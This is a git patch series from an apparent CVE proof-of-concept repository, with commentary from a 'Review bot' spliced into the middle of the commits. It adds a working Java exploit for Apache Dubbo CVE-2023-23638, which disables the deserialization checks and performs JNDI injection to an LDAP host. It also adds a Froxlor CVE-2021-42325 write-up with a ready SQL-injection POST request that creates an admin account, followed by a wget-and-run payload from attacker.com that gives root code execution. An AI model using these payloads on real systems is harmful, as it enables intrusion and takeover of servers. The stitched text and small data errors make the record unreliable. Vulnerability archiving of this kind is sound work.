cve/apache-Dubbo/2023/CVE-2023-23638/poc/DemoConsumer.java create mode 100644 cve/apache-Dubbo/2023/CVE-2023-23638/poc/DemoProvider.java create mode 100644 cve/apache-Dubbo/2023/CVE-2023-23638/pom.xml create mode 100644 cve/apache-Dubbo/2023/yaml/CVE-2023-23638.yaml diff --git a/cve/apache-Dubbo/2023/CVE-2023-23638/README.md b/cve/apache-Dubbo/2023/CVE-2023-23638/README.md new file mode 100644 index 00000000..f267cc7b --- /dev/null +++ b/cve/apache-Dubbo/2023/CVE-2023-23638/README.md @@ -0,0 +1,7 @@ +# CVE-2023-23638 + +dubbo泛型调用存在反序列化漏洞,可导致恶意代码执行。该问题影响Apache Dubbo 2.7.x 2.7.21及之前版本; Apache Dubbo 3.0.x 版本 3.0.13 及之前版本; Apache Dubbo 3.1.x 版本 3.1.5 及之前的版本。 + +复现时需要为 DemoComsumer 添加 VM 参数: `-Ddubbo.hessian.allowNonSerializable=true`, 详情参考 https://su18.org/post/hessian/#serializable + +POC 的本质是利用某个 class 修改 properties 以绕过限制, 代码给的是 JNDI 注入, 可以参考 [CVE-2023-23638 Apache Dubbo JavaNative反序列化漏洞分析](https://mp.weixin.qq.com/s?__biz=Mzg3OTcyNjM1MQ==&mid=2247483788&idx=1&sn=7954ad20fec203469a13a09050536a1c) 自行修改成反序列化的利用方式 diff --git a/cve/apache-Dubbo/2023/CVE-2023-23638/poc/DemoConsumer.java b/cve/apache-Dubbo/2023/CVE-2023-23638/poc/DemoConsumer.java new file mode 100644 index 00000000..6349f728 --- /dev/null +++ b/cve/apache-Dubbo/2023/CVE-2023-23638/poc/DemoConsumer.java 
@@ -0,0 +1,51 @@ +package org.apache.dubbo.samples; + +import org.apache.dubbo.common.utils.ConcurrentHashSet; +import org.apache.dubbo.common.utils.SerializeClassChecker; +import org.apache.dubbo.rpc.service.GenericService; +import org.springframework.context.support.ClassPathXmlApplicationContext; +import sun.misc.Unsafe; + +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.util.*; + +public class DemoConsumer { + public static void main(String[] args) throws Exception { + ClassPathXmlApplicationContext context = new ClassPathXmlApplicationContext("spring/generic-type-consumer.xml"); + context.start(); + + Constructor constructor = Unsafe.class.getDeclaredConstructor(); + constructor.setAccessible(true); + Unsafe unsafe = constructor.newInstance(); + + Set allowSet = new ConcurrentHashSet<>(); + allowSet.add("com.sun.rowset.JdbcRowSetImpl".toLowerCase()); + + SerializeClassChecker serializeClassChecker = (SerializeClassChecker) unsafe.allocateInstance(SerializeClassChecker.class); + Field f = SerializeClassChecker.class.getDeclaredField("CLASS_DESERIALIZE_ALLOWED_SET"); + f.setAccessible(true); + f.set(serializeClassChecker, allowSet); + +// SerializeClassChecker serializeClassChecker = (SerializeClassChecker) unsafe.allocateInstance(SerializeClassChecker.class); +// Field f = SerializeClassChecker.class.getDeclaredField("CLASS_DESERIALIZE_BLOCKED_SET"); +// f.setAccessible(true); +// f.set(serializeClassChecker, new ConcurrentHashSet<>()); + + Map map1 = new HashMap<>(); + map1.put("class", "org.apache.dubbo.common.utils.SerializeClassChecker"); + map1.put("INSTANCE", serializeClassChecker); + + Map map2 = new LinkedHashMap<>(); + map2.put("class", "com.sun.rowset.JdbcRowSetImpl"); + map2.put("dataSourceName", "ldap://192.168.100.1:1389/Basic/Command/calc"); + map2.put("autoCommit", true); + + List list = new LinkedList(); + list.add(map1); + list.add(map2); + + GenericService genericService = (GenericService) 
context.getBean("helloService"); + genericService.$invoke("sayHello", new String[]{"java.lang.String"}, new Object[]{list}); + } +} diff --git a/cve/apache-Dubbo/2023/CVE-2023-23638/poc/DemoProvider.java b/cve/apache-Dubbo/2023/CVE-2023-23638/poc/DemoProvider.java new file mode 100644 index 00000000..bc872532 --- /dev/null +++ b/cve/apache-Dubbo/2023/CVE-2023-23638/poc/DemoProvider.java @@ -0,0 +1,18 @@ +package org.apache.dubbo.samples; + +import org.springframework.context.support.ClassPathXmlApplicationContext; + +import java.util.concurrent.CountDownLatch; + +public class DemoProvider { + + public static void main(String[] args) throws Exception { + + ClassPathXmlApplicationContext context = new ClassPathXmlApplicationContext("spring/generic-type-provider.xml"); + context.start(); + + System.out.println("dubbo service started"); + new CountDownLatch(1).await(); + } + +} diff --git a/cve/apache-Dubbo/2023/CVE-2023-23638/pom.xml b/cve/apache-Dubbo/2023/CVE-2023-23638/pom.xml new file mode 100644 index 00000000..63f4db38 --- /dev/null +++ b/cve/apache-Dubbo/2023/CVE-2023-23638/pom.xml @@ -0,0 +1,121 @@ + + + + + 4.0.0 + + dubbo-samples-test + org.apache.dubbo.samples + 1.0-SNAPSHOT + + + 1.8 + 1.8 + 3.1.5 + + + 4.3.3.RELEASE + 4.13.1 + 3.7.0 + + + + + + org.springframework + spring-framework-bom + ${spring.version} + pom + import + + + org.apache.dubbo + dubbo-bom + ${dubbo.version} + pom + import + + + org.apache.dubbo + dubbo-dependencies-zookeeper + ${dubbo.version} + pom + + + junit + junit + ${junit.version} + test + + + + org.springframework + spring-test + test + + + + + + + org.apache.dubbo + dubbo + + + + org.apache.dubbo + dubbo-dependencies-zookeeper + pom + + + + + + + org.apache.maven.plugins + maven-compiler-plugin + ${maven-compiler-plugin.version} + + ${source.level} + ${target.level} + + + + org.springframework.boot + spring-boot-maven-plugin + + + + repackage + + + spring-boot + + org.apache.dubbo.samples.DemoConsumer + + + + + + + + 
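Review bot: The four commented-out lines after `f.set(serializeClassChecker, allowSet);` (the variant that replaces CLASS_DESERIALIZE_BLOCKED_SET with an empty ConcurrentHashSet) are dead code that leaves a reader guessing which of the two checker manipulations the PoC actually depends on; delete them or replace them with a one-line comment such as `// alternative: swapping the blocked set for an empty one works as well, the allow-set route is used here` so the intent is recorded without shipping two half-maintained paths. The collections are declared as raw types (`Set allowSet`, `Map map1`, `Map map2`, `List list`), which compiles with unchecked warnings under the 1.8 source level set in pom.xml; `Map<String, Object> map1 = new HashMap<>();` and the matching parameterised declarations for the others would also document the shape of the argument handed to `$invoke`. The class has no header comment; a short Javadoc stating that it is the consumer side of the CVE-2023-23638 reproduction, that it expects the provider from DemoProvider to be running, and that it needs the `-Ddubbo.hessian.allowNonSerializable=true` VM option the README mentions would let the source stand on its own.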
diff --git a/cve/apache-Dubbo/2023/yaml/CVE-2023-23638.yaml b/cve/apache-Dubbo/2023/yaml/CVE-2023-23638.yaml new file mode 100644 index 00000000..01126780 --- /dev/null +++ b/cve/apache-Dubbo/2023/yaml/CVE-2023-23638.yaml @@ -0,0 +1,22 @@ +id: CVE-2023-23638 +source: https://github.com/X1r0z/CVE-2023-23638 +info: + name: Apache Dubbo是一款 RPC 服务开发框架,用于解决微服务架构下的服务治理与通信问题 + severity: CRITICAL + description: | + Dubbo是一个高性能优秀的服务框架。CVE-2023-23638中,Dubbo泛型调用存在反序列化漏洞,可导致恶意代码执行。 + scope-of-influence: + Dubbo 2.7.0 - 2.7.21 + Dubbo 3.0.0 - 3.0.13 + Dubbo 3.1.0 - 3.1.5 + reference: + - https://exp10it.cn/2023/03/apache-dubbo-cve-2023-23638-%E5%88%86%E6%9E%90/ + - https://mp.weixin.qq.com/s?__biz=Mzg3OTcyNjM1MQ==&mid=2247483788&idx=1&sn=7954ad20fec203469a13a09050536a1c + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-23638 + cwe-id: CWE-502 + cnvd-id: None + kve-id: None + tags: Apache Dubbo, Deserialization vulnerability when generic invoke diff --git a/openkylin_list.yaml b/openkylin_list.yaml index ce103e6a..3051c951 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -11,6 +11,7 @@ cve: - CVE-2020-13932 apache-CouchDB: - CVE-2022-24706 + - CVE-2023-23638 apache-Dubbo: - CVE-2021-43297 - CVE-2021-25641 From 8a36e199937946dcd2f0ca5a60827ea2962bdabb Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:33:44 +0000 Subject: [PATCH 035/109] add cve/Froxlor/2023. Signed-off-by: wangyue --- cve/Froxlor/2023/CVE-2021-42325 | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2023/CVE-2021-42325 diff --git a/cve/Froxlor/2023/CVE-2021-42325 b/cve/Froxlor/2023/CVE-2021-42325 new file mode 100644 index 00000000..e69de29b From de4d411831e736a9b8107f6bcf4d39c7514b94bf Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:34:49 +0000 Subject: [PATCH 036/109] rename cve/Froxlor/2023/CVE-2021-42325 to cve/Froxlor/2023/CVE-2021-42325/. 
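Review bot: `severity: CRITICAL` is written in upper case, whereas the other yaml added earlier in this series, cve/WordPress/2019/yaml/CVE-2019-8942.yaml, uses lower-case `high`; if anything consumes these files and matches on the value case-sensitively the two entries will be classified differently, so `severity: critical` is the safer form. The `reference:` list also contains only two blog analyses and no authoritative record, while the sibling file links https://nvd.nist.gov/vuln/detail/CVE-2019-8942; adding the NVD record for CVE-2023-23638 would give the `cvss-metrics`/`cvss-score` block a citable source. `tags:` mixes a product name with a free-text description ("Apache Dubbo, Deserialization vulnerability when generic invoke") where the earlier file uses short labels ("RCE, 远程代码执行"); keeping tags to short keywords such as `RCE, Deserialization` keeps them usable as filters.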
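Review bot: The new `- CVE-2023-23638` line is inserted directly after `- CVE-2022-24706`, i.e. inside the `apache-CouchDB:` list, although the PoC this commit adds lives under cve/apache-Dubbo/2023 and the yaml names Apache Dubbo as the affected product; the line belongs below the `apache-Dubbo:` key next to `- CVE-2021-43297` and `- CVE-2021-25641`. As committed, anyone indexing openkylin_list.yaml by product will attribute a Dubbo deserialization issue to CouchDB and will not find it under Dubbo at all.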
Signed-off-by: wangyue --- cve/Froxlor/2023/{CVE-2021-42325 => CVE-2021-42325/README.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/Froxlor/2023/{CVE-2021-42325 => CVE-2021-42325/README.md} (100%) diff --git a/cve/Froxlor/2023/CVE-2021-42325 b/cve/Froxlor/2023/CVE-2021-42325/README.md similarity index 100% rename from cve/Froxlor/2023/CVE-2021-42325 rename to cve/Froxlor/2023/CVE-2021-42325/README.md From bef4525b9c28437595efb8b48a7fc6ea6e4a8d2b Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:35:37 +0000 Subject: [PATCH 037/109] update cve/Froxlor/2023/CVE-2021-42325/README.md. Signed-off-by: wangyue --- cve/Froxlor/2023/CVE-2021-42325/README.md | 91 +++++++++++++++++++++++ 1 file changed, 91 insertions(+) diff --git a/cve/Froxlor/2023/CVE-2021-42325/README.md b/cve/Froxlor/2023/CVE-2021-42325/README.md index e69de29b..4fd9416a 100644 --- a/cve/Froxlor/2023/CVE-2021-42325/README.md +++ b/cve/Froxlor/2023/CVE-2021-42325/README.md 
@@ -0,0 +1,91 @@ +# Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) +# Exploit Author: Martin Cernac +# Date: 2021-11-05 +# Vendor: Froxlor (https://froxlor.org/) +# Software Link: https://froxlor.org/download.php +# Affected Version: 0.10.28, 0.10.29, 0.10.29.1 +# Patched Version: 0.10.30 +# Category: Web Application +# Tested on: Ubuntu +# CVE: 2021-42325 + +# 1. Technical Description: +# +# Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. +# +# 1.1 Pre-requisites +# - Access to a customer account +# - Ability to specify database name when creating a database +# - Feature only availible from 0.10.28 onward and must be manually enabled + + +# 2. Proof Of Concept (PoC): +# +# The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root +# +# 2.1 Privilege Escalation +# +# - Sign into Froxlor as a customer +# - View your databases +# - Create a database +# - Put your payload into the "User/Database name" field (if enabled) +# - Application will error out however your SQL query will be executed +# +# The following is a POST request example of running the payload provided, resulting in an administrator account being created +--- +POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 +Host: localhost +Content-Type: application/x-www-form-urlencoded +Content-Length: 448 + 
+s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 +--- +# +# 2.2 Remote Code Execution +# +# To achieve RCE as root: +# +# - Sign into Froxlor as the newly created admin account (payload example creds are x:a) +# - Go to System Settings +# - Go to Webserver settings +# - Adjust "Webserver reload command" field to a custom command +# - The command must not contain any of the following special characters: ;|&><`$~? +# - For details, see "safe_exec" function in lib/Froxlor/FileDir.php +# - For example commands see Payloads 4.2 section +# - Trigger configuration file rebuild +# - Use menu item "Rebuild config files" +# - Await a root cron job to execute your command + + +# 3. Vulnerable resources and parameters +# /customer_mysql.php (POST field: custom_suffix) + + +# 4. Payloads +# +# 4.1 SQL Injection payload +# The following payload creates a new Froxlor admin with full access to all customers and the server configuration +# The credentials are: +# - username: x +# - password: a +# +# `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- +# +# +# 4.2 Remote Code Execution payload +# Two part payload: +# - wget http://attacker.com/malicious.txt -O /runme.php +# - php /runme.php + + +# 5. 
Timeline +# 2021-10-11 Discovery +# 2021-10-11 Contact with developer +# 2021-10-11 Patch issued but no release rolled out +# 2021-10-12 Reserved CVE-2021-42325 +# 2021-11-05 Fix release rolled out +# 2021-11-07 Public disclosure + + +# 6. References: +# https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file From a564daccde1ca2ad8ba2f900da3ced56886381d8 Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:38:34 +0000 Subject: [PATCH 038/109] update cve/Froxlor/2023/CVE-2021-42325/README.md. Signed-off-by: wangyue --- cve/Froxlor/2023/CVE-2021-42325/README.md | 25 +++++++++-------------- 1 file changed, 10 insertions(+), 15 deletions(-) diff --git a/cve/Froxlor/2023/CVE-2021-42325/README.md b/cve/Froxlor/2023/CVE-2021-42325/README.md index 4fd9416a..c9cd9d3f 100644 --- a/cve/Froxlor/2023/CVE-2021-42325/README.md +++ b/cve/Froxlor/2023/CVE-2021-42325/README.md @@ -9,17 +9,15 @@ # Tested on: Ubuntu # CVE: 2021-42325 -# 1. Technical Description: -# -# Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. +### 1. Technical Description: +Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. # # 1.1 Pre-requisites # - Access to a customer account # - Ability to specify database name when creating a database # - Feature only availible from 0.10.28 onward and must be manually enabled - - -# 2. Proof Of Concept (PoC): + +### 2. Proof Of Concept (PoC): # # The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root # 
@@ -56,12 +54,11 @@ s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffi # - Use menu item "Rebuild config files" # - Await a root cron job to execute your command - -# 3. Vulnerable resources and parameters +### 3. Vulnerable resources and parameters # /customer_mysql.php (POST field: custom_suffix) -# 4. Payloads +### 4. Payloads # # 4.1 SQL Injection payload # The following payload creates a new Froxlor admin with full access to all customers and the server configuration @@ -76,16 +73,14 @@ s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffi # Two part payload: # - wget http://attacker.com/malicious.txt -O /runme.php # - php /runme.php - - -# 5. Timeline + +### 5. Timeline # 2021-10-11 Discovery # 2021-10-11 Contact with developer # 2021-10-11 Patch issued but no release rolled out # 2021-10-12 Reserved CVE-2021-42325 # 2021-11-05 Fix release rolled out # 2021-11-07 Public disclosure - - -# 6. References: + +### 6. References: # https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file From 3c6c0ebf78fa1cdff1b04b26763be6a3f4473311 Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:40:39 +0000 Subject: [PATCH 039/109] update cve/Froxlor/2023/CVE-2021-42325/README.md. Signed-off-by: wangyue --- cve/Froxlor/2023/CVE-2021-42325/README.md | 126 +++++++++++----------- 1 file changed, 63 insertions(+), 63 deletions(-) diff --git a/cve/Froxlor/2023/CVE-2021-42325/README.md b/cve/Froxlor/2023/CVE-2021-42325/README.md index c9cd9d3f..1a371371 100644 --- a/cve/Froxlor/2023/CVE-2021-42325/README.md +++ b/cve/Froxlor/2023/CVE-2021-42325/README.md 
@@ -1,35 +1,35 @@ -# Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) -# Exploit Author: Martin Cernac -# Date: 2021-11-05 -# Vendor: Froxlor (https://froxlor.org/) -# Software Link: https://froxlor.org/download.php -# Affected Version: 0.10.28, 0.10.29, 0.10.29.1 -# Patched Version: 0.10.30 -# Category: Web Application -# Tested on: Ubuntu -# CVE: 2021-42325 + Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) + Exploit Author: Martin Cernac + Date: 2021-11-05 + Vendor: Froxlor (https://froxlor.org/) + Software Link: https://froxlor.org/download.php + Affected Version: 0.10.28, 0.10.29, 0.10.29.1 + Patched Version: 0.10.30 + Category: Web Application + Tested on: Ubuntu + CVE: 2021-42325 ### 1. Technical Description: Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. -# -# 1.1 Pre-requisites -# - Access to a customer account -# - Ability to specify database name when creating a database -# - Feature only availible from 0.10.28 onward and must be manually enabled + +#### 1.1 Pre-requisites + - Access to a customer account + - Ability to specify database name when creating a database + - Feature only availible from 0.10.28 onward and must be manually enabled ### 2. 
Proof Of Concept (PoC): + +The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root # -# The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root -# -# 2.1 Privilege Escalation -# -# - Sign into Froxlor as a customer -# - View your databases -# - Create a database -# - Put your payload into the "User/Database name" field (if enabled) -# - Application will error out however your SQL query will be executed -# -# The following is a POST request example of running the payload provided, resulting in an administrator account being created +#### 2.1 Privilege Escalation + + - Sign into Froxlor as a customer + - View your databases + - Create a database + - Put your payload into the "User/Database name" field (if enabled) + - Application will error out however your SQL query will be executed + + The following is a POST request example of running the payload provided, resulting in an administrator account being created --- POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 Host: localhost 
@@ -38,49 +38,49 @@ Content-Length: 448 s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 --- -# -# 2.2 Remote Code Execution -# -# To achieve RCE as root: -# -# - Sign into Froxlor as the newly created admin account (payload example creds are x:a) -# - Go to System Settings -# - Go to Webserver settings -# - Adjust "Webserver reload command" field to a custom command -# - The command must not contain any of the following special characters: ;|&><`$~? -# - For details, see "safe_exec" function in lib/Froxlor/FileDir.php -# - For example commands see Payloads 4.2 section -# - Trigger configuration file rebuild -# - Use menu item "Rebuild config files" -# - Await a root cron job to execute your command + +#### 2.2 Remote Code Execution + + To achieve RCE as root: + + - Sign into Froxlor as the newly created admin account (payload example creds are x:a) + - Go to System Settings + - Go to Webserver settings + - Adjust "Webserver reload command" field to a custom command + - The command must not contain any of the following special characters: ;|&><`$~? + - For details, see "safe_exec" function in lib/Froxlor/FileDir.php + - For example commands see Payloads 4.2 section + - Trigger configuration file rebuild + - Use menu item "Rebuild config files" + - Await a root cron job to execute your command ### 3. Vulnerable resources and parameters -# /customer_mysql.php (POST field: custom_suffix) + /customer_mysql.php (POST field: custom_suffix) ### 4. 
Payloads -# -# 4.1 SQL Injection payload -# The following payload creates a new Froxlor admin with full access to all customers and the server configuration -# The credentials are: -# - username: x -# - password: a -# -# `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- -# -# -# 4.2 Remote Code Execution payload -# Two part payload: -# - wget http://attacker.com/malicious.txt -O /runme.php -# - php /runme.php + +#### 4.1 SQL Injection payload + The following payload creates a new Froxlor admin with full access to all customers and the server configuration + The credentials are: + - username: x + - password: a + + `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- + + +#### 4.2 Remote Code Execution payload + Two part payload: + - wget http://attacker.com/malicious.txt -O /runme.php + - php /runme.php ### 5. Timeline -# 2021-10-11 Discovery -# 2021-10-11 Contact with developer -# 2021-10-11 Patch issued but no release rolled out -# 2021-10-12 Reserved CVE-2021-42325 -# 2021-11-05 Fix release rolled out -# 2021-11-07 Public disclosure + 2021-10-11 Discovery + 2021-10-11 Contact with developer + 2021-10-11 Patch issued but no release rolled out + 2021-10-12 Reserved CVE-2021-42325 + 2021-11-05 Fix release rolled out + 2021-11-07 Public disclosure ### 6. References: -# https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file + https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file From ad9ca0a74775377025df771b6d7f76c5b9b0b776 Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:42:39 +0000 Subject: [PATCH 040/109] update cve/Froxlor/2023/CVE-2021-42325/README.md. 
Signed-off-by: wangyue --- cve/Froxlor/2023/CVE-2021-42325/README.md | 31 +++++++++++++---------- 1 file changed, 17 insertions(+), 14 deletions(-) diff --git a/cve/Froxlor/2023/CVE-2021-42325/README.md b/cve/Froxlor/2023/CVE-2021-42325/README.md index 1a371371..c1b38e2e 100644 --- a/cve/Froxlor/2023/CVE-2021-42325/README.md +++ b/cve/Froxlor/2023/CVE-2021-42325/README.md @@ -1,13 +1,14 @@ - Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) - Exploit Author: Martin Cernac - Date: 2021-11-05 - Vendor: Froxlor (https://froxlor.org/) - Software Link: https://froxlor.org/download.php - Affected Version: 0.10.28, 0.10.29, 0.10.29.1 - Patched Version: 0.10.30 - Category: Web Application - Tested on: Ubuntu - CVE: 2021-42325 +- Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) +- Exploit Author: Martin Cernac +- Date: 2021-11-05 +- Vendor: Froxlor (https://froxlor.org/) +- Software Link: https://froxlor.org/download.php +- Affected Version: 0.10.28, 0.10.29, 0.10.29.1 +- Patched Version: 0.10.30 +- Category: Web Application +- Tested on: Ubuntu +- CVE: 2021-42325 + ### 1. Technical Description: Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. 
@@ -28,16 +29,18 @@ The following is a walkthrough of privilege escalation from a mere customer to a - Create a database - Put your payload into the "User/Database name" field (if enabled) - Application will error out however your SQL query will be executed - The following is a POST request example of running the payload provided, resulting in an administrator account being created ---- + + +``` POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: 448 - s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 ---- + +``` + #### 2.2 Remote Code Execution From cf726d4abc1c08220b40ef7c00115a4f53d6cef3 Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:44:07 +0000 Subject: [PATCH 041/109] add cve/Froxlor/2023/yaml. Signed-off-by: wangyue --- cve/Froxlor/2023/yaml/CVE-2021-42325.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2023/yaml/CVE-2021-42325.yaml diff --git a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml new file mode 100644 index 00000000..e69de29b From dd4424ffa73898c4b74ac460639890a3bcc7a1c1 Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:50:02 +0000 Subject: [PATCH 042/109] update cve/Froxlor/2023/yaml/CVE-2021-42325.yaml. Signed-off-by: wangyue --- cve/Froxlor/2023/yaml/CVE-2021-42325.yaml | 24 +++++++++++++++++++++++ 1 file changed, 24 insertions(+) 
diff --git a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml
index e69de29b..85ee9e0e 100644
--- a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml
+++ b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml
@@ -0,0 +1,24 @@
+id: CVE-2021-42325
+source:
+ https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782
+info:
+ name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。
+ severity: high
+ description: |
+ Froxlor是Froxlor团队的一套轻量级服务器管理软件。
+ Froxlor存在安全漏洞,该漏洞允许在数据库管理器DbManagerMySQL.php中通过自定义数据库名称注入SQL。
+ scope-of-influence:
+ Froxlor 0.10.2l9.1
+ reference:
+ - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html
+ - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782
+ - https://www.exploit-db.com/exploits/50502
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2021-42325
+ edb-id: 50502
+ cwe-id: None
+ cnvd-id: None
+ kve-id: None
+ tags: exploit, remote, code execution, sql injection
\ No newline at end of file
From 914a8bc607f692e206ac7866888ef706052b6acf Mon Sep 17 00:00:00 2001
From: wangyue
Date: Thu, 6 Apr 2023 02:59:49 +0000
Subject: [PATCH 043/109] update openkylin_list.yaml.
Signed-off-by: wangyue
---
 openkylin_list.yaml | 3 +++
 1 file changed, 3 insertions(+)
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 3051c951..f6e78d03 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -42,6 +42,9 @@ cve:
 - CVE-2019-0230
 Influx-DB:
 - CVE-2019-20933
+ Froxlor:
+ - CVE-2023-0315
+ - CVE-2021-42325
 linux-kernel:
 - CVE-2021-4204
 - CVE-2021-29155
From 61d28594e9d38f0179519398279cb48c8272aad6 Mon Sep 17 00:00:00 2001
From: wangyue
Date: Sun, 9 Apr 2023 03:47:33 +0000
Subject: [PATCH 044/109] update cve/Froxlor/2023/yaml/CVE-2021-42325.yaml.
Signed-off-by: wangyue
---
 cve/Froxlor/2023/yaml/CVE-2021-42325.yaml | 10 ++++++----
 1 file changed, 6 insertions(+), 4 deletions(-)
diff --git a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml
index 85ee9e0e..c266bcd9 100644
--- a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml
+++ b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml
@@ -3,22 +3,24 @@ source:
 https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782
 info:
 name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。
- severity: high
+ severity: 高危
 description: |
 Froxlor是Froxlor团队的一套轻量级服务器管理软件。
 Froxlor存在安全漏洞,该漏洞允许在数据库管理器DbManagerMySQL.php中通过自定义数据库名称注入SQL。
 scope-of-influence:
 Froxlor 0.10.2l9.1
 reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-42325
+ - https://avd.aliyun.com/detail?id=AVD-2021-42325
 - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html
